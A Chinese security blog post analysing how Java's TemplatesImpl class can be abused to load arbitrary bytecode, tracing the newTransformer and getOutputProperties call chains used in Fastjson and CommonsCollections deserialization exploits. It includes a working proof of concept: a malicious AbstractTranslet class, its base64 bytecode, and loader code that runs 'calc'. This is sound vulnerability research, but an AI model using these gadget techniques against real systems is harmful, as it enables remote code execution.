利用TemplatesImpl加载字节码

最新推荐文章于 2024-04-17 20:49:49 发布
最新推荐文章于 2024-04-17 20:49:49 发布
阅读量568 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: # java漏洞 文章标签: 经验分享 web安全 安全 java 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Thunderclap_/article/details/128901343
文章深入探讨了Java中的TemplatesImpl类和TransletClassLoader的defineClass方法,详细解析了方法的作用域变化以及如何通过TemplatesImpl的getTransletInstance()和newTransformer()方法调用链来触发defineClass。同时,文章介绍了如何利用ysoserial工具设置私有属性来构造恶意字节码,执行自定义行为,如弹出计算器,展示了潜在的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、TemplatesImpl

虽然大部分上层开发者不会直接使用到defineClass方法,但是Java底层还是有一些类用到了它(否则他 也没存在的价值了对吧),这就是TemplatesImpl
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 这个类中定义了一个内部类 TransletClassLoader
这个类里重写了defineClass 方法,并且这里没有显式地声明其定义域。Java中默认情况下,如果一个 方法没有显式声明作用域,其作用域为default,为包作用域, 即可以在同一个包内被调用 。所以也就是说这里的defineClass 由其父类的 protected类型变成了一个default类型的方法,可以被类外部调用。

二、调用分析

我们从TransletClassLoader#defineClass() 向前追溯一下调用链:
  • TemplatesImpl 类中只有一个方法 TemplatesImpl#defineTransletClasses 用到了 TransletClassLoader 类,但是 TemplatesImpl#defineTransletClasses 是 private 类型。继续跟看哪调用了 TemplatesImpl#defineTransletClasses 方法。
  • 有三个方法调用了 TemplatesImpl#defineTransletClasses(), 其中 TemplatesImpl#getTransletIndex() 是 public 类型的TemplatesImpl#getTransletClasses() 和 TemplatesImpl#getTransletInstance() 是 private 属性的
public synchronized int getTransletIndex()            //直接调用发现没有成功
private synchronized Class[] getTransletClasses()
private Translet getTransletInstance()
这里可以尝试直接用 TemplatesImpl#getTransletIndex(),那么调用链如下:但是发现并没有成功。
TemplatesImpl#getTransletIndex() -> TemplatesImpl#defineTransletClasses() -> TemplatesImpl#defineTransletClasses() -> defineClass
  • 继续跟 TemplatesImpl#getTransletClasses() 和 TemplatesImpl#getTransletInstance(), TemplatesImpl 类中已经没有调用 getTransletClasses() 的方法了,而 getTransletInstance() 方法在 public synchronized Transformer newTransformer 方法中被调用了,所以构造如下链,P牛用的就是如下的链。
TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() ->TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()  
  • 再继续跟进 TemplatesImpl#newTransformer() 发现 TemplatesImpl#getOutputProperties() 调用了 TemplatesImpl#newTransformer() 并且它也是 public 类型的,如下也成功触发。(这一利用链也正好符合了fastjson的利用条件)
TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()

三、利用分析:

1.setFieldValue 方法是ysoserial中用来设置私有属性的
  • _bytecodes 是由字节码组成的数组;
  • _name 可以是任意字符串,只要不为null即可;
  • _tfactory 需要是一个TransformerFactoryImpl 对象,因为 TemplatesImpl#defineTransletClasses() 方法里有调用到 _tfactory.getExternalExtensionsMap() ,如果是null会出错。
2.TemplatesImpl 中对加载的字节码是有一定要求的:这个字节码对应的类必须 是com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的子类。
  • 例如如下代码中继承了AbstractTranslet。
  • 构造函数中执行calc弹出计算器。 
package com.TemplastesImplTest;
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class codeTest extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
    public codeTest() throws Exception{
        Runtime.getRuntime().exec("calc");
    }
}
  • 进行base64编码
  • 替换到图下code对象代码中,执行即可弹出计算器 
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import java.util.Base64;
import static ysoserial.payloads.util.Reflections.setFieldValue;

public class TemplatesTest {
    public static void main(String[] args) throws Exception {
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWBwAbAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAHAAgHABwMAB0AHgEABGNhbGMMAB8AIAEAH2NvbS9odWF3ZWkvQ2xhc3NMb2FkZXIvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAALAAQADAANAA0ACwAAAAQAAQAMAAEADQAOAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAARAAsAAAAEAAEADwABAA0AEAACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAFQALAAAABAABAA8AAQARAAAAAgAS");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][] {code});
        setFieldValue(obj, "_name", "test");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
        obj.newTransformer();
    }
}
参考:
[Java安全]利用TemplatesImpl执行字节码
Y4tacker的博客
07-25 3764
文章目录defineClass利用TemplatesImpl执行字节码 defineClass 介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码 public class TouchFile{ public TouchFile() throws Exception { Runtime.getRuntime().exec("calc"); } } 把它编译成字节码后Base64 之后运行 Method defineClass =
Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)
Y4tacker的博客
09-13 796
文章目录写在前面流程分析 写在前面 关于TemplatesImpl加载字节码就不多说了,之前也写过自己翻一翻,或者网上看看其他大佬的,至于为什么选择这一个,因为这里面大多数过程都有,除了$ref,算是比较全面了 流程分析 核心代码 public class test1 { public static void main(String[] args) throws Exception{ String payload = "{\"@type\":\"com.sun.org.apache
爆赞好文之java动态字节码加载(TemplatesImpl)简谈
2301_79724395的博客
04-17 1370
虽然已经学过了,不过忘完了,nice,重学动态加载就是很动态知道吧,你以为,说了等于没说,怎么个动态法呢?具体是在于三个函数loadClass()从已经加载缓存、父加载器等位置寻找(其实就是双亲委派机制),在前面没有找到的情况下执行findClassfindClass()根据基础URL指定的方法来加载字节码,可能会在本地文件系统,jar包,或是远程http服务器上读取字节码,然后交给下一个函数defineClass()的作用就是处理前面传入的字节码,将其处理为真正的Java
Java安全-动态加载字节码
XINO
08-17 735
首先我们来看看什么是JAVA字节码Java字节码Java虚拟机执行的一种虚拟指令格式。换一种说法就是编译后得到的class文件内容,本质上就是JVM执行使用的一指令。可以说是**所有能够恢复成一个并在JVM虚拟机里加载的字节序列。个人理解就是利用一些方法去执行class文件内容。**接下来给大家带来几种加载字节码的方法。...
JAVA笔记??序列化
12-22
所谓的对象序列化(在很多地方也被成为串行化),是指将对象转换成二进制数据流的一种实现手段。通过将对象序列化,可以方便地实现对象的传输及保存。  在Java中提供有ObjectInputStream与ObjectOutputStream这两...
fastjson反序列化分析
hongduilanjun的博客
03-16 2674
1.fastjson简单使用 User: package com.naihe; public class User { private String name; private int age; public User() {} public User(String name, int age) { this.name = name; this.age = age; } public String getName
Fastjson反序列化漏洞TemplateImpl利用链条跟踪与分析
Armandhe的博客
11-04 679
Fastjson反序列化漏洞TemplateImpl利用链条跟踪与分析
fastjson——分享
Matthew
08-06 2022
fastjson——分享 功能描述 fastjson的功能就是将json格式转换为、字符串等供下一步代码的调用,或者将、字符串等数据转换成json数据进行传输,有点似序列化的操作; FastJson利用 toJSONString 方法来序列化对象,而反序列化还原回 Object 的方法,主要的API有两个,分别是 JSON.parseObject 和 JSON.parse ,最主要的区别就是前者返回的是 JSONObject 而后者返回的是实际型的对象,当在没有对应的定义的情况下,通常情况下都会使
TemplatesImplGadget中提取bytecode
fnmsd的博客
03-22 4521
大半年前开的头,扔那就给忘了,终于想起来给写完了(*/ω\*)
Java中动态加载字节码的方法 (持续补充)
mole_exp的博客
02-10 3150
汇总并持续补充Java中动态加载字节码的方法。
Fastjson 1.2.24远程代码执行漏洞(com.sun.rowset.JdbcRowSetImpl)
further_eye的博客
11-16 4370
漏洞是利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险,并调用危险连接远程rmi主机,通过其中的恶意执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大的影响。
ysoserial Gadgets.createTemplatesImpl函数分析
fnmsd的博客
03-13 3359
前言 在阅读《java反序列化工具ysoserial分析》之后,对ysoserial有了一些更深的了解,但文章在对createTemplatesImpl函数进行分析时有一些缺失,没有解释一些代码作用,本文是对createTemplatesImpl函数分析的一些补充及一些疑问。 在阅读本文前请先阅读《java反序列化工具ysoserial分析》中关于createTemplatesImpl分析的部分 ...
[Java安全]Fastjson 1.2.22-1.2.24 TemplatesImpl利用链分析
cosmoslin的博客
04-18 790
简介 对于Fastjson 1.2.22-1.2.24 版本的反序列化漏洞的利用,目前已知的主要有以下的利用链: 基于TemplateImpl; 基于JNDI(又分为基于Bean Property型和Field型); 这里我使用的环境是JDK7u51 fastjson-1.2.24.jar,commons-codec-1.12.jar,commons-io-2.5.jar,unboundid-ldapsdk-4.0.9.jar 反序列化TemplatesImpl+加载触发 先看一下POC: Te
[Java反序列化]Java-CommonsCollections2TemplatesImpl利用链分析
Y4tacker的博客
07-28 571
文章目录Java-CommonsCollections2TemplatesImpl利用链分析完整代码 Java-CommonsCollections2TemplatesImpl利用链分析 我们知道我们之前可以利用TemplatesImpl 构造出⽆Transformer数组的利⽤链,那这里是否可以实现呢,答案是是的,在这里的queue 现在开始正文,还是稍微详细说一下利用过程吧 现在我们的目标就是通过PriorityQueue来调用TemplatesImpl的newTransformer来加载字节码 T
TemplatesImpl在Shiro中的利用
Le1a's Blog
03-23 3286
TemplatesImpl在Shiro中的利用 文章首发自: https://www.le1a.com/posts/6e876d26/ 前言 前面学习了CC1、CC3和CC6,其中CC6是不限制版本的一条链,那么为什么还要用到TemplatesImpl这条链呢?不妨我们设想一下:命令执行和代码执行到底谁更有价值? 例如在PHP中会遇到一个场景,call_user_func和eval都能造成的代码执行,而更多的人愿意使用eval,原因是call_user_func在某种情况下会被限制不能使用assert和sy
WebJava反序列化之从CC3看TemplatesImpl利用
uuzeray的博客
02-29 1516
都在InvokerTransformer上,若WAF直接禁用了该,我们可以用CC3来突破,CC3的sink在于上面提到的TemplatesImpl的newTransformer方法,它最后会调用defineClass(),将字节码初始化成一个可控的,若该是有着精心构造的静态方法的恶意,便可以完成攻击。在 Java 反序列化漏洞中,攻击者通常会构造恶意的序列化数据,通过触发反序列化操作来执行恶意代码。那么,接下来的问题是,从哪里去触发TemplatesImpl的newTransformer方法呢?
Java代码审计——Fastjson TemplatesImpl调用链
王嘟嘟的博客
12-09 2791
0x00 前言 反序列化总纲 除开jdbc调用链,还有一个TemplatesImpl的调用链,这个在CC链中是出现过的。可以参考:调用链 主要的要点在满以下三个变量 _bytecodes _name _tfactory 还有就是调用newTransformer的方法 0x01 调用链 先上poc: final String CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"; ParserConfig conf
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 1251
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
payload和CommonsBeanutils1的关系
最新发布
03-24
<think>好的,我现在需要回答用户关于Payload在Apache Commons Beanutils1中的作用及实现方式的问题。首先,用户提到可能涉及漏洞利用或工作原理,所以我应该先了解Commons Beanutils1相关的漏洞背景。 首先,我记得Commons Beanutils是一个处理JavaBean的工具库,它允许通过属性名动态访问getter和setter方法。用户提供的引用[3]中提到,PropertyUtils.getProperty可以自动调用getter方法,这可能被恶意利用。比如,在反序列化漏洞中,攻击者可能构造特定的对象链(Gadget Chain),利用Beanutils的方法执行任意代码。 接下来,我需要确定Payload在CommonsBeanutils1中的具体作用。Payload通常指攻击中携带的恶意代码或数据。在这里,可能是指利用Beanutils库的反序列化漏洞来执行命令的Payload。例如,在CB1利用链中,攻击者可能通过精心构造的Java对象,触发Beanutils的方法调用,最终执行系统命令。 然后,实现方式方面,需要结合漏洞利用链。根据引用[3],CB1链可能利用PropertyUtils.getProperty来调用任意getter方法。如果某个的getter方法有危险操作,比如通过Runtime.exec执行命令,攻击者就可以构造对象,让反序列化过程中触发这些方法。例如,构造一个TemplatesImpl对象,其getOutputProperties方法会被调用,进而执行恶意字节码。 另外,可能需要用到其他库的来形成完整的利用链,比如结合Commons Collections的Transformer链,因为Beanutils本身可能没有直接执行命令的方法,但结合其他库可以实现。例如,使用InvokerTransformer来反射调用方法,如Runtime.exec。 用户提供的引用[1]、[2]、[3]都提到了Beanutils的PropertyUtils,特别是动态调用getter方法,这应该是漏洞的关键点。引用[4]提到的Apache Commons Text虽然相关,但可能不直接涉及此漏洞,不过需要确认是否有其他关联。 最后,我需要确保回答结构清晰,分点说明作用和实现方式,并引用提供的资料。同时生成相关问题,帮助用户深入理解。</think>### Payload在Apache Commons Beanutils 1中的作用及实现方式 #### 作用 在漏洞利用中,**Payload**通常指通过构造特定数据触发漏洞的恶意代码或指令。对于`CommonsBeanutils1`(CB1)利用链,其核心作用是**利用Java反序列化漏洞,通过动态调用JavaBean的getter方法实现任意代码执行**。例如,通过`PropertyUtils.getProperty`方法触发恶意的属性读取,最终执行系统命令或加载远程代码[^3]。 #### 实现方式 1. **动态属性调用** `Commons Beanutils`提供`PropertyUtils.getProperty`方法,可自动调用JavaBean中与属性名对应的getter方法。例如,若对象有属性`name`,该方法会调用`getName()`[^3]。攻击者可构造恶意对象,将属性指向危险方法(如`Runtime.exec`)。 2. **Gadget链构造** CB1链通常需要结合其他库(如`Commons-Collections`)的形成完整的利用链。例如: - 利用`InvokerTransformer`通过反射调用任意方法。 - 通过`TemplatesImpl`加载恶意字节码,触发`getOutputProperties()`方法。 3. **反序列化触发** 攻击者将构造的恶意对象序列化后发送给目标。当目标应用反序列化该数据时,会逐层调用Gadget链中的方法,最终执行Payload中的代码。 #### 示例简化模型 ```java // 伪代码:恶意对象构造 恶意 { private Runnable payload = () -> Runtime.getRuntime().exec("calc.exe"); public Runnable getPayload() { return this.payload; } // 触发时执行命令 } // 通过PropertyUtils.getProperty(obj, "payload")触发getPayload() ``` #### 防御建议 - 升级`Commons Beanutils`至安全版本(如1.9.4+)。 - 禁用不必要的反序列化功能,或使用白名单校验反序列化。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值